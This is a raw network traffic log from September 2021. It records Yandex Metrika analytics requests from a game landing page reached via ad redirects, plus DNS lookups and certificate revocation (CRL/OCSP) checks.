Referer: https://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/index.html?p1=https%3A//click.hooligapps.com/%3Fpid%3D3%26offer_id%3D4%26ref_id%3DVjN8MTQ1NzY3ODN8MjU3NzI0OHwxNTc2MDF8MTYzMDkyMDg2MnwwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDB8MTU0LjYxLjcxLjUxfDJ8c2g9NzY4ODU3N2VhMjE2ZWVmNjI1MDE5NjdlNGRkYmExYjcyMTAzMjQ1YzE1Y2IxNjRlZmY1MTdiNGE0NDVlMjA2MmQwZTYzOGFmMjU3MTlmODBiNTYxYjE1ZDVmMWJiYTM4ZWNhYWY1Mjc0NTcyYzYxYjYxNWY3NGJjM2E3Zjg0ZWNlYmUyMzg2OTIyM2UxOTc4YmIwMDYwNmI1OWM5MzQ0NGM2OGRjOGIyfGRhYmI5YTdkYjUzOWM4OWUwYjFiY2E1MWYxZWM3YmYz%26sub1%3Dpu_final%26sub2%3D14576783
ResponseHTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Cache-Control: max-age=3600
Content-Encoding: gzip
Content-Length: 81736
Content-Type: application/javascript
Date: Mon, 06 Sep 2021 09:35:29 GMT
ETag: "6127b5a4-13f48"
Expires: Mon, 06 Sep 2021 10:35:29 GMT
Last-Modified: Thu, 26 Aug 2021 16:59:05 GMT
Strict-Transport-Security: max-age=31536000
-
GEThttps://mc.yandex.ru/watch/48457376?wmode=7&page-url=https%3A%2F%2Ftheonlygames.com%2Fft%2Fft_0719%2Fland_ft_310719_na_en%2Findex.html%3Fp1%3Dhttps%253A%2F%2Fclick.hooligapps.com%2F%253Fpid%253D3%2526offer_id%253D4%2526ref_id%253DVjN8MTQ1NzY3ODN8MjU3NzI0OHwxNTc2MDF8MTYzMDkyMDg2MnwwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDB8MTU0LjYxLjcxLjUxfDJ8c2g9NzY4ODU3N2VhMjE2ZWVmNjI1MDE5NjdlNGRkYmExYjcyMTAzMjQ1YzE1Y2IxNjRlZmY1MTdiNGE0NDVlMjA2MmQwZTYzOGFmMjU3MTlmODBiNTYxYjE1ZDVmMWJiYTM4ZWNhYWY1Mjc0NTcyYzYxYjYxNWY3NGJjM2E3Zjg0ZWNlYmUyMzg2OTIyM2UxOTc4YmIwMDYwNmI1OWM5MzQ0NGM2OGRjOGIyfGRhYmI5YTdkYjUzOWM4OWUwYjFiY2E1MWYxZWM3YmYz%2526sub1%253Dpu_final%2526sub2%253D14576783&page-ref=https%3A%2F%2Fwww.profitabletrustednetwork.com%2Fb1fsmdd9m%3Fkey%3D0f22c1fd609f13cb7947c8cabfe1a90d%26submetric%3D14576783&charset=utf-8&browser-info=pv%3A1%3Agdpr%3A14%3Avf%3A25rt5xty9ed9wegbqt%3Afu%3A0%3Aen%3Autf-8%3Ala%3Aja-JP%3Av%3A631%3Acn%3A1%3Adp%3A0%3Als%3A80537730987%3Ahid%3A345537643%3Az%3A0%3Ai%3A20210906093152%3Aet%3A1630920713%3Ac%3A1%3Arn%3A751572280%3Arqn%3A1%3Au%3A1630920713230965631%3Aw%3A1280x626%3As%3A1280x720x24%3Ask%3A1%3Aj%3A1%3Ans%3A1630920643455%3Ads%3A0%2C0%2C647%2C2%2C1118%2C0%2C%2C10133%2C0%2C%2C%2C%2C20114%3Adsn%3A0%2C0%2C648%2C1%2C1118%2C0%2C%2C10132%2C0%2C%2C%2C%2C20115%3Awv%3A2%3Arqnl%3A1%3Ati%3A2%3Ast%3A1630920713%3At%3AFunTitansRemote address:87.250.251.119:443RequestGET /watch/48457376?wmode=7&page-url=https%3A%2F%2Ftheonlygames.com%2Fft%2Fft_0719%2Fland_ft_310719_na_en%2Findex.html%3Fp1%3Dhttps%253A%2F%2Fclick.hooligapps.com%2F%253Fpid%253D3%2526offer_id%253D4%2526ref_id%253DVjN8MTQ1NzY3ODN8MjU3NzI0OHwxNTc2MDF8MTYzMDkyMDg2MnwwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDB8MTU0LjYxLjcxLjUxfDJ8c2g9NzY4ODU3N2VhMjE2ZWVmNjI1MDE5NjdlNGRkYmExYjcyMTAzMjQ1YzE1Y2IxNjRlZmY1MTdiNGE0NDVlMjA2MmQwZTYzOGFmMjU3MTlmODBiNTYxYjE1ZDVmMWJiYTM4ZWNhYWY1Mjc0NTcyYzYxYjYxNWY3NGJjM2E3Zjg0ZWNlYmUyMzg2OTIyM2UxOTc4YmIwMDYwNmI1OWM5MzQ0NGM2OGRjOGIyfGRhYmI5YTdkYjUzOWM4OWUwYjFiY2E1MWYxZWM3YmYz%2526sub1%253Dpu_final%2526sub2%253D14576783&page-ref=https%3A%2F%2Fwww.profitabletrustednetwork.com%2Fb1fsmdd9m%3Fkey%3D0f22c1fd609f13cb7947c8cabfe1a90d%26submetric%3D14576783&charset=utf-8&browser-info=pv%3A1%3Agdpr%3A14%3Avf%3A25rt5xty9ed9wegbqt%3Afu%3A0%3Aen%3Autf-8%3Ala%3Aja-JP%3Av%3A631%3Acn%3A1%3Adp%3A0%3Als%3A80537730987%3Ahid%3A345537643%3Az%3A0%3Ai%3A20210906093152%3Aet%3A1630920713%3Ac%3A1%3Arn%3A751572280%3Arqn%3A1%3Au%3A1630920713230965631%3Aw%3A1280x626%3As%3A1280x720x24%3Ask%3A1%3Aj%3A1%3Ans%3A1630920643455%3Ads%3A0%2C0%2C647%2C2%2C1118%2C0%2C%2C10133%2C0%2C%2C%2C%2C20114%3Adsn%3A0%2C0%2C648%2C1%2C1118%2C0%2C%2C10132%2C0%2C%2C%2C%2C20115%3Awv%3A2%3Arqnl%3A1%3Ati%3A2%3Ast%3A1630920713%3At%3AFunTitans HTTP/1.1
Accept: */*
Referer: https://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/index.html?p1=https%3A//click.hooligapps.com/%3Fpid%3D3%26offer_id%3D4%26ref_id%3DVjN8MTQ1NzY3ODN8MjU3NzI0OHwxNTc2MDF8MTYzMDkyMDg2MnwwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDB8MTU0LjYxLjcxLjUxfDJ8c2g9NzY4ODU3N2VhMjE2ZWVmNjI1MDE5NjdlNGRkYmExYjcyMTAzMjQ1YzE1Y2IxNjRlZmY1MTdiNGE0NDVlMjA2MmQwZTYzOGFmMjU3MTlmODBiNTYxYjE1ZDVmMWJiYTM4ZWNhYWY1Mjc0NTcyYzYxYjYxNWY3NGJjM2E3Zjg0ZWNlYmUyMzg2OTIyM2UxOTc4YmIwMDYwNmI1OWM5MzQ0NGM2OGRjOGIyfGRhYmI5YTdkYjUzOWM4OWUwYjFiY2E1MWYxZWM3YmYz%26sub1%3Dpu_final%26sub2%3D14576783
Accept-Language: ja-JP
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: mc.yandex.ru
Connection: Keep-Alive
ResponseHTTP/1.1 302 Moved temporarily
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Date: Mon, 06 Sep 2021 09:35:31 GMT
Expires: Mon, 06-Sep-2021 09:35:31 GMT
Last-Modified: Mon, 06-Sep-2021 09:35:31 GMT
Location: /watch/48457376/1?wmode=7&page-url=https%3A%2F%2Ftheonlygames.com%2Fft%2Fft_0719%2Fland_ft_310719_na_en%2Findex.html%3Fp1%3Dhttps%253A%2F%2Fclick.hooligapps.com%2F%253Fpid%253D3%2526offer_id%253D4%2526ref_id%253DVjN8MTQ1NzY3ODN8MjU3NzI0OHwxNTc2MDF8MTYzMDkyMDg2MnwwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDB8MTU0LjYxLjcxLjUxfDJ8c2g9NzY4ODU3N2VhMjE2ZWVmNjI1MDE5NjdlNGRkYmExYjcyMTAzMjQ1YzE1Y2IxNjRlZmY1MTdiNGE0NDVlMjA2MmQwZTYzOGFmMjU3MTlmODBiNTYxYjE1ZDVmMWJiYTM4ZWNhYWY1Mjc0NTcyYzYxYjYxNWY3NGJjM2E3Zjg0ZWNlYmUyMzg2OTIyM2UxOTc4YmIwMDYwNmI1OWM5MzQ0NGM2OGRjOGIyfGRhYmI5YTdkYjUzOWM4OWUwYjFiY2E1MWYxZWM3YmYz%2526sub1%253Dpu_final%2526sub2%253D14576783&page-ref=https%3A%2F%2Fwww.profitabletrustednetwork.com%2Fb1fsmdd9m%3Fkey%3D0f22c1fd609f13cb7947c8cabfe1a90d%26submetric%3D14576783&charset=utf-8&browser-info=pv%3A1%3Agdpr%3A14%3Avf%3A25rt5xty9ed9wegbqt%3Afu%3A0%3Aen%3Autf-8%3Ala%3Aja-JP%3Av%3A631%3Acn%3A1%3Adp%3A0%3Als%3A80537730987%3Ahid%3A345537643%3Az%3A0%3Ai%3A20210906093152%3Aet%3A1630920713%3Ac%3A1%3Arn%3A751572280%3Arqn%3A1%3Au%3A1630920713230965631%3Aw%3A1280x626%3As%3A1280x720x24%3Ask%3A1%3Aj%3A1%3Ans%3A1630920643455%3Ads%3A0%2C0%2C647%2C2%2C1118%2C0%2C%2C10133%2C0%2C%2C%2C%2C20114%3Adsn%3A0%2C0%2C648%2C1%2C1118%2C0%2C%2C10132%2C0%2C%2C%2C%2C20115%3Awv%3A2%3Arqnl%3A1%3Ati%3A2%3Ast%3A1630920713%3At%3AFunTitans
Pragma: no-cache
Set-Cookie: yandexuid=493731001630920931; Expires=Tue, 06-Sep-2022 09:35:31 GMT; Domain=.yandex.ru; Path=/
Set-Cookie: yabs-sid=1769307221630920931; Path=/
Set-Cookie: i=GQcffOdmEbinNy57CzPNORI+WrhKtfZRpUj9C9/eeu9l7jLmBsWnhyyi/S1T9tcwj0y4hexw8J3RikLgQ1p0leh5IUg=; Expires=Thu, 04-Sep-2031 09:35:24 GMT; Domain=.yandex.ru; Path=/; Secure; HttpOnly
Set-Cookie: ymex=1662456931.yrts.1630920931#1662456931.yrtsi.1630920931; Expires=Tue, 06-Sep-2022 09:35:31 GMT; Domain=.yandex.ru; Path=/
Strict-Transport-Security: max-age=31536000
Transfer-Encoding: chunked
X-XSS-Protection: 1; mode=block
-
GEThttps://mc.yandex.ru/watch/48457376/1?wmode=7&page-url=https%3A%2F%2Ftheonlygames.com%2Fft%2Fft_0719%2Fland_ft_310719_na_en%2Findex.html%3Fp1%3Dhttps%253A%2F%2Fclick.hooligapps.com%2F%253Fpid%253D3%2526offer_id%253D4%2526ref_id%253DVjN8MTQ1NzY3ODN8MjU3NzI0OHwxNTc2MDF8MTYzMDkyMDg2MnwwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDB8MTU0LjYxLjcxLjUxfDJ8c2g9NzY4ODU3N2VhMjE2ZWVmNjI1MDE5NjdlNGRkYmExYjcyMTAzMjQ1YzE1Y2IxNjRlZmY1MTdiNGE0NDVlMjA2MmQwZTYzOGFmMjU3MTlmODBiNTYxYjE1ZDVmMWJiYTM4ZWNhYWY1Mjc0NTcyYzYxYjYxNWY3NGJjM2E3Zjg0ZWNlYmUyMzg2OTIyM2UxOTc4YmIwMDYwNmI1OWM5MzQ0NGM2OGRjOGIyfGRhYmI5YTdkYjUzOWM4OWUwYjFiY2E1MWYxZWM3YmYz%2526sub1%253Dpu_final%2526sub2%253D14576783&page-ref=https%3A%2F%2Fwww.profitabletrustednetwork.com%2Fb1fsmdd9m%3Fkey%3D0f22c1fd609f13cb7947c8cabfe1a90d%26submetric%3D14576783&charset=utf-8&browser-info=pv%3A1%3Agdpr%3A14%3Avf%3A25rt5xty9ed9wegbqt%3Afu%3A0%3Aen%3Autf-8%3Ala%3Aja-JP%3Av%3A631%3Acn%3A1%3Adp%3A0%3Als%3A80537730987%3Ahid%3A345537643%3Az%3A0%3Ai%3A20210906093152%3Aet%3A1630920713%3Ac%3A1%3Arn%3A751572280%3Arqn%3A1%3Au%3A1630920713230965631%3Aw%3A1280x626%3As%3A1280x720x24%3Ask%3A1%3Aj%3A1%3Ans%3A1630920643455%3Ads%3A0%2C0%2C647%2C2%2C1118%2C0%2C%2C10133%2C0%2C%2C%2C%2C20114%3Adsn%3A0%2C0%2C648%2C1%2C1118%2C0%2C%2C10132%2C0%2C%2C%2C%2C20115%3Awv%3A2%3Arqnl%3A1%3Ati%3A2%3Ast%3A1630920713%3At%3AFunTitansRemote address:87.250.251.119:443RequestGET /watch/48457376/1?wmode=7&page-url=https%3A%2F%2Ftheonlygames.com%2Fft%2Fft_0719%2Fland_ft_310719_na_en%2Findex.html%3Fp1%3Dhttps%253A%2F%2Fclick.hooligapps.com%2F%253Fpid%253D3%2526offer_id%253D4%2526ref_id%253DVjN8MTQ1NzY3ODN8MjU3NzI0OHwxNTc2MDF8MTYzMDkyMDg2MnwwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDB8MTU0LjYxLjcxLjUxfDJ8c2g9NzY4ODU3N2VhMjE2ZWVmNjI1MDE5NjdlNGRkYmExYjcyMTAzMjQ1YzE1Y2IxNjRlZmY1MTdiNGE0NDVlMjA2MmQwZTYzOGFmMjU3MTlmODBiNTYxYjE1ZDVmMWJiYTM4ZWNhYWY1Mjc0NTcyYzYxYjYxNWY3NGJjM2E3Zjg0ZWNlYmUyMzg2OTIyM2UxOTc4YmIwMDYwNmI1OWM5MzQ0NGM2OGRjOGIyfGRhYmI5YTdkYjUzOWM4OWUwYjFiY2E1MWYxZWM3YmYz%2526sub1%253Dpu_final%2526sub2%253D14576783&page-ref=https%3A%2F%2Fwww.profitabletrustednetwork.com%2Fb1fsmdd9m%3Fkey%3D0f22c1fd609f13cb7947c8cabfe1a90d%26submetric%3D14576783&charset=utf-8&browser-info=pv%3A1%3Agdpr%3A14%3Avf%3A25rt5xty9ed9wegbqt%3Afu%3A0%3Aen%3Autf-8%3Ala%3Aja-JP%3Av%3A631%3Acn%3A1%3Adp%3A0%3Als%3A80537730987%3Ahid%3A345537643%3Az%3A0%3Ai%3A20210906093152%3Aet%3A1630920713%3Ac%3A1%3Arn%3A751572280%3Arqn%3A1%3Au%3A1630920713230965631%3Aw%3A1280x626%3As%3A1280x720x24%3Ask%3A1%3Aj%3A1%3Ans%3A1630920643455%3Ads%3A0%2C0%2C647%2C2%2C1118%2C0%2C%2C10133%2C0%2C%2C%2C%2C20114%3Adsn%3A0%2C0%2C648%2C1%2C1118%2C0%2C%2C10132%2C0%2C%2C%2C%2C20115%3Awv%3A2%3Arqnl%3A1%3Ati%3A2%3Ast%3A1630920713%3At%3AFunTitans HTTP/1.1
Accept: */*
Referer: https://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/index.html?p1=https%3A//click.hooligapps.com/%3Fpid%3D3%26offer_id%3D4%26ref_id%3DVjN8MTQ1NzY3ODN8MjU3NzI0OHwxNTc2MDF8MTYzMDkyMDg2MnwwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDB8MTU0LjYxLjcxLjUxfDJ8c2g9NzY4ODU3N2VhMjE2ZWVmNjI1MDE5NjdlNGRkYmExYjcyMTAzMjQ1YzE1Y2IxNjRlZmY1MTdiNGE0NDVlMjA2MmQwZTYzOGFmMjU3MTlmODBiNTYxYjE1ZDVmMWJiYTM4ZWNhYWY1Mjc0NTcyYzYxYjYxNWY3NGJjM2E3Zjg0ZWNlYmUyMzg2OTIyM2UxOTc4YmIwMDYwNmI1OWM5MzQ0NGM2OGRjOGIyfGRhYmI5YTdkYjUzOWM4OWUwYjFiY2E1MWYxZWM3YmYz%26sub1%3Dpu_final%26sub2%3D14576783
Accept-Language: ja-JP
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: mc.yandex.ru
Connection: Keep-Alive
Cookie: yandexuid=493731001630920931; i=GQcffOdmEbinNy57CzPNORI+WrhKtfZRpUj9C9/eeu9l7jLmBsWnhyyi/S1T9tcwj0y4hexw8J3RikLgQ1p0leh5IUg=; ymex=1662456931.yrts.1630920931#1662456931.yrtsi.1630920931; yabs-sid=1769307221630920931
ResponseHTTP/1.1 200 Ok
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Content-Length: 350
Content-Type: application/json; charset=utf-8
Date: Mon, 06 Sep 2021 09:35:32 GMT
Expires: Mon, 06-Sep-2021 09:35:32 GMT
Last-Modified: Mon, 06-Sep-2021 09:35:32 GMT
Pragma: no-cache
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
-
GEThttps://mc.yandex.ru/watch/48457376?page-url=https%3A%2F%2Ftheonlygames.com%2Fft%2Fft_0719%2Fland_ft_310719_na_en%2Findex.html%3Fp1%3Dhttps%253A%2F%2Fclick.hooligapps.com%2F%253Fpid%253D3%2526offer_id%253D4%2526ref_id%253DVjN8MTQ1NzY3ODN8MjU3NzI0OHwxNTc2MDF8MTYzMDkyMDg2MnwwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDB8MTU0LjYxLjcxLjUxfDJ8c2g9NzY4ODU3N2VhMjE2ZWVmNjI1MDE5NjdlNGRkYmExYjcyMTAzMjQ1YzE1Y2IxNjRlZmY1MTdiNGE0NDVlMjA2MmQwZTYzOGFmMjU3MTlmODBiNTYxYjE1ZDVmMWJiYTM4ZWNhYWY1Mjc0NTcyYzYxYjYxNWY3NGJjM2E3Zjg0ZWNlYmUyMzg2OTIyM2UxOTc4YmIwMDYwNmI1OWM5MzQ0NGM2OGRjOGIyfGRhYmI5YTdkYjUzOWM4OWUwYjFiY2E1MWYxZWM3YmYz%2526sub1%253Dpu_final%2526sub2%253D14576783&charset=utf-8&browser-info=nb%3A1%3Acl%3A2099%3Aar%3A1%3Agdpr%3A14%3Avf%3A25rt5xty9ed9wegbqt%3Afu%3A1%3Aen%3Autf-8%3Ala%3Aja-JP%3Av%3A631%3Acn%3A1%3Adp%3A0%3Als%3A80537730987%3Ahid%3A345537643%3Az%3A0%3Ai%3A20210906093208%3Aet%3A1630920728%3Ac%3A1%3Arn%3A6258196%3Arqn%3A2%3Au%3A1630920713230965631%3Aw%3A1280x626%3As%3A1280x720x24%3Ask%3A1%3Aj%3A1%3Aeu%3A2%3Ans%3A1630920643455%3Ads%3A%2C%2C%2C%2C%2C%2C%2C%2C%2C69676%2C69676%2C0%2C%3Adsn%3A%2C%2C%2C%2C%2C%2C%2C%2C%2C69677%2C69677%2C0%2C%3Awv%3A2%3Aadb%3A2%3Arqnl%3A1%3Ati%3A2%3Ast%3A1630920728Remote address:87.250.251.119:443RequestGET /watch/48457376?page-url=https%3A%2F%2Ftheonlygames.com%2Fft%2Fft_0719%2Fland_ft_310719_na_en%2Findex.html%3Fp1%3Dhttps%253A%2F%2Fclick.hooligapps.com%2F%253Fpid%253D3%2526offer_id%253D4%2526ref_id%253DVjN8MTQ1NzY3ODN8MjU3NzI0OHwxNTc2MDF8MTYzMDkyMDg2MnwwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDB8MTU0LjYxLjcxLjUxfDJ8c2g9NzY4ODU3N2VhMjE2ZWVmNjI1MDE5NjdlNGRkYmExYjcyMTAzMjQ1YzE1Y2IxNjRlZmY1MTdiNGE0NDVlMjA2MmQwZTYzOGFmMjU3MTlmODBiNTYxYjE1ZDVmMWJiYTM4ZWNhYWY1Mjc0NTcyYzYxYjYxNWY3NGJjM2E3Zjg0ZWNlYmUyMzg2OTIyM2UxOTc4YmIwMDYwNmI1OWM5MzQ0NGM2OGRjOGIyfGRhYmI5YTdkYjUzOWM4OWUwYjFiY2E1MWYxZWM3YmYz%2526sub1%253Dpu_final%2526sub2%253D14576783&charset=utf-8&browser-info=nb%3A1%3Acl%3A2099%3Aar%3A1%3Agdpr%3A14%3Avf%3A25rt5xty9ed9wegbqt%3Afu%3A1%3Aen%3Autf-8%3Ala%3Aja-JP%3Av%3A631%3Acn%3A1%3Adp%3A0%3Als%3A80537730987%3Ahid%3A345537643%3Az%3A0%3Ai%3A20210906093208%3Aet%3A1630920728%3Ac%3A1%3Arn%3A6258196%3Arqn%3A2%3Au%3A1630920713230965631%3Aw%3A1280x626%3As%3A1280x720x24%3Ask%3A1%3Aj%3A1%3Aeu%3A2%3Ans%3A1630920643455%3Ads%3A%2C%2C%2C%2C%2C%2C%2C%2C%2C69676%2C69676%2C0%2C%3Adsn%3A%2C%2C%2C%2C%2C%2C%2C%2C%2C69677%2C69677%2C0%2C%3Awv%3A2%3Aadb%3A2%3Arqnl%3A1%3Ati%3A2%3Ast%3A1630920728 HTTP/1.1
Accept: */*
Referer: https://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/index.html?p1=https%3A//click.hooligapps.com/%3Fpid%3D3%26offer_id%3D4%26ref_id%3DVjN8MTQ1NzY3ODN8MjU3NzI0OHwxNTc2MDF8MTYzMDkyMDg2MnwwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDB8MTU0LjYxLjcxLjUxfDJ8c2g9NzY4ODU3N2VhMjE2ZWVmNjI1MDE5NjdlNGRkYmExYjcyMTAzMjQ1YzE1Y2IxNjRlZmY1MTdiNGE0NDVlMjA2MmQwZTYzOGFmMjU3MTlmODBiNTYxYjE1ZDVmMWJiYTM4ZWNhYWY1Mjc0NTcyYzYxYjYxNWY3NGJjM2E3Zjg0ZWNlYmUyMzg2OTIyM2UxOTc4YmIwMDYwNmI1OWM5MzQ0NGM2OGRjOGIyfGRhYmI5YTdkYjUzOWM4OWUwYjFiY2E1MWYxZWM3YmYz%26sub1%3Dpu_final%26sub2%3D14576783
Accept-Language: ja-JP
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: mc.yandex.ru
Connection: Keep-Alive
Cookie: yandexuid=493731001630920931; i=GQcffOdmEbinNy57CzPNORI+WrhKtfZRpUj9C9/eeu9l7jLmBsWnhyyi/S1T9tcwj0y4hexw8J3RikLgQ1p0leh5IUg=; ymex=1662456931.yrts.1630920931#1662456931.yrtsi.1630920931; yabs-sid=1769307221630920931
ResponseHTTP/1.1 200 Ok
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Content-Length: 43
Content-Type: image/gif
Date: Mon, 06 Sep 2021 09:35:46 GMT
Expires: Mon, 06-Sep-2021 09:35:46 GMT
Last-Modified: Mon, 06-Sep-2021 09:35:46 GMT
Pragma: no-cache
Strict-Transport-Security: max-age=31536000
X-XSS-Protection: 1; mode=block
-
GEThttps://mc.yandex.ru/metrika/advert.gifRemote address:87.250.251.119:443RequestGET /metrika/advert.gif HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://theonlygames.com/ft/ft_0719/land_ft_310719_na_en/index.html?p1=https%3A//click.hooligapps.com/%3Fpid%3D3%26offer_id%3D4%26ref_id%3DVjN8MTQ1NzY3ODN8MjU3NzI0OHwxNTc2MDF8MTYzMDkyMDg2MnwwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDB8MTU0LjYxLjcxLjUxfDJ8c2g9NzY4ODU3N2VhMjE2ZWVmNjI1MDE5NjdlNGRkYmExYjcyMTAzMjQ1YzE1Y2IxNjRlZmY1MTdiNGE0NDVlMjA2MmQwZTYzOGFmMjU3MTlmODBiNTYxYjE1ZDVmMWJiYTM4ZWNhYWY1Mjc0NTcyYzYxYjYxNWY3NGJjM2E3Zjg0ZWNlYmUyMzg2OTIyM2UxOTc4YmIwMDYwNmI1OWM5MzQ0NGM2OGRjOGIyfGRhYmI5YTdkYjUzOWM4OWUwYjFiY2E1MWYxZWM3YmYz%26sub1%3Dpu_final%26sub2%3D14576783
Accept-Language: ja-JP
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: mc.yandex.ru
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=3600
Content-Length: 43
Content-Type: image/gif
Date: Mon, 06 Sep 2021 09:35:31 GMT
ETag: "6127adff-2b"
Expires: Mon, 06 Sep 2021 10:35:31 GMT
Last-Modified: Thu, 26 Aug 2021 15:39:16 GMT
Strict-Transport-Security: max-age=31536000
-
DNScrl.certum.plRemote address:8.8.8.8:53Requestcrl.certum.plIN AResponsecrl.certum.plIN CNAMEcrl.akamai.certum.plcrl.akamai.certum.plIN CNAMEcrl.certum.pl.edgekey.netcrl.certum.pl.edgekey.netIN CNAMEe83157.dscb.akamaiedge.nete83157.dscb.akamaiedge.netIN A104.110.191.19e83157.dscb.akamaiedge.netIN A104.110.191.14
-
GEThttp://crl.certum.pl/ca.crlRemote address:104.110.191.19:80RequestGET /ca.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.certum.pl
ResponseHTTP/1.1 200 OK
Content-Type: application/pkix-crl
Content-Length: 845
Last-Modified: Thu, 08 Oct 2020 12:51:27 GMT
Accept-Ranges: bytes
Cache-Control: public, max-age=60
Date: Mon, 06 Sep 2021 09:35:37 GMT
Connection: keep-alive
-
GEThttp://crl.certum.pl/ca.crlRemote address:104.110.191.19:80RequestGET /ca.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.certum.pl
ResponseHTTP/1.1 200 OK
Content-Type: application/pkix-crl
Content-Length: 845
Last-Modified: Thu, 08 Oct 2020 12:51:27 GMT
Accept-Ranges: bytes
Cache-Control: public, max-age=60
Date: Mon, 06 Sep 2021 09:35:39 GMT
Connection: keep-alive
-
GEThttp://crl.certum.pl/ctnca.crlRemote address:104.110.191.19:80RequestGET /ctnca.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.certum.pl
ResponseHTTP/1.1 200 OK
Content-Type: application/pkix-crl
Content-Length: 619
Last-Modified: Thu, 08 Oct 2020 12:58:27 GMT
Accept-Ranges: bytes
Cache-Control: public, max-age=60
Date: Mon, 06 Sep 2021 09:35:48 GMT
Connection: keep-alive
-
DNSyandex.ocsp-responder.comRemote address:8.8.8.8:53Requestyandex.ocsp-responder.comIN AResponseyandex.ocsp-responder.comIN CNAMEcdn.yandex.netcdn.yandex.netIN A5.45.205.241cdn.yandex.netIN A5.45.205.243cdn.yandex.netIN A5.45.205.242cdn.yandex.netIN A5.45.205.245cdn.yandex.netIN A5.45.205.244
-
GEThttp://yandex.ocsp-responder.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBStniMGfahyWUWDEeSLUFbNR9JLAgQUN1zjGeCyjqGoTtLPq9Dc4wtcNU0CECosiqdXosrVzE6LrmbYt3c%3DRemote address:5.45.205.241:80RequestGET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBStniMGfahyWUWDEeSLUFbNR9JLAgQUN1zjGeCyjqGoTtLPq9Dc4wtcNU0CECosiqdXosrVzE6LrmbYt3c%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: yandex.ocsp-responder.com
ResponseHTTP/1.1 200 OK
Server: nginx/1.17.9
Date: Mon, 06 Sep 2021 09:35:49 GMT
Content-Type: application/ocsp-response
Content-Length: 1514
Connection: keep-alive
Keep-Alive: timeout=5
X-Cached: STALE
Cache-Control: max-age=845
-
DNScrls.yandex.netRemote address:8.8.8.8:53Requestcrls.yandex.netIN AResponsecrls.yandex.netIN CNAMEcrls.yandex.rucrls.yandex.ruIN CNAMEcdn.yandex.netcdn.yandex.netIN A5.45.205.243cdn.yandex.netIN A5.45.205.242cdn.yandex.netIN A5.45.205.245cdn.yandex.netIN A5.45.205.244cdn.yandex.netIN A5.45.205.241
-
GEThttp://yandex.ocsp-responder.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBStniMGfahyWUWDEeSLUFbNR9JLAgQUN1zjGeCyjqGoTtLPq9Dc4wtcNU0CECosiqdXosrVzE6LrmbYt3c%3DRemote address:5.45.205.241:80RequestGET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBStniMGfahyWUWDEeSLUFbNR9JLAgQUN1zjGeCyjqGoTtLPq9Dc4wtcNU0CECosiqdXosrVzE6LrmbYt3c%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: yandex.ocsp-responder.com
ResponseHTTP/1.1 200 OK
Server: nginx/1.17.9
Date: Mon, 06 Sep 2021 09:35:50 GMT
Content-Type: application/ocsp-response
Content-Length: 1514
Connection: keep-alive
Keep-Alive: timeout=5
X-Cached: STALE
Cache-Control: max-age=830
-
GEThttp://crls.yandex.net/certum/ycasha2.crlRemote address:5.45.205.243:80RequestGET /certum/ycasha2.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crls.yandex.net
ResponseHTTP/1.1 200 OK
Server: nginx/1.17.9
Date: Mon, 06 Sep 2021 09:35:50 GMT
Content-Type: application/pkix-crl
Content-Length: 2024
Connection: keep-alive
Keep-Alive: timeout=5
Strict-Transport-Security: max-age=63072000; includeSubDomains
Last-Modified: Mon, 06 Sep 2021 04:03:44 GMT
Cache-Control: public, max-age=60
Accept-Ranges: bytes
-
